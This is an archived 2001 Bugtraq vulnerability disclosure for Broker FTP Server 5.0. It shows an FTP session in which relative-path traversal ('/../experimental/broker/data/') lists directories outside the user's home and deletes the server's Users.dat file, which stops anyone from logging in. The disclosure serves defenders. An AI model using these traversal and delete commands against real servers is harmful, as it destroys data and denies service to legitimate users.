Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Bugtraq: Broker Ftp Server 5.0 Vulnerability

Broker Ftp Server 5.0 Vulnerability

From: <se00020_at_LION.CC>
Date: Sat, 3 Mar 2001 18:56:23 -0000

Vulnerability:

users can break out of their root directory and list
directories.
Depending on the priv. you have other commands
like delete maybe
executed outside of the home. directory.

e:\crap\ was used as homedir.
deleting files in e:\crap is enabled

Detail:

Problem: Again relative paths.

dir:
listings directories outside of root dir.
Risc: medium-high

230 User test logged in.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
-rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33
movedtohomedir.txt
-rw-rw-rw- 1 ftp ftp 11 Mar 02 00:29
bisontest.txt
drw-rw-rw- 1 ftp ftp 0 Mar 03 15:59 HTTP
drw-rw-rw- 1 ftp ftp 0 Mar 03 17:05 huhu
226 File sent ok
FTP: 323 Bytes empfangen in 0,00Sekunden
323000,00KB/s
ftp> cd ..
550 CWD failed. ..: No permission

ftp> dir /../experimental/broker/data/
200 Port command successful.
150 Opening data connection for directory list.
-rw-rw-rw- 1 ftp ftp 175 Nov 19 2000
UserGrps.dat
-rw-rw-rw- 1 ftp ftp 154 Mar 03 16:54
Users.dat
-rw-rw-rw- 1 ftp ftp 0 Mar 03 16:33
Users.4800.bak
-rw-rw-rw- 1 ftp ftp 0 Mar 03 16:34
Users.4800-Prof.bak
-rw-rw-rw- 1 ftp ftp 31 Mar 03 16:59
BannCtrl.ini
-rw-rw-rw- 1 ftp ftp 34 Mar 03 17:08
KickCtrl.ini
-rw-rw-rw- 1 ftp ftp 38 Mar 03 16:37
Events_1.dat
-rw-rw-rw- 1 ftp ftp 0 Mar 03 16:53
Events_lst_1.dat
-rw-rw-rw- 1 ftp ftp 154 Mar 03 16:54 Kopie
von Users.dat
226 File sent ok
FTP: 629 Bytes empfangen in 0,00Sekunden
629000,00KB/s

delete:
deleting files outside of root dir.

ftp> delete /../experimental/broker/data/users.dat
250 File '/../experimental/broker/data/users.dat'
deleted.
ftp> quit
221-Thank you for your visit.
221-
221 Goodbye.

C:\>ftp 10.17.3.44
Verbindung mit 10.17.3.44 wurde hergestellt.
220 FTP Server ready [***]
Benutzer (10.17.3.44:(none)): test
331 Password required for test.
Kennwort:
530 Login incorrect.
Anmeldung fehlgeschlagen.
ftp> :(

by deleting users.dat, noone will be able to logon ...

put/get commands seem to be secure...

This was tested with win2k and trail version of broker
ver. 5.0

se00020_at_fhs-hagenberg.ac.at or
se00020_at_lion.cc
Received on Mar 04 2001

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]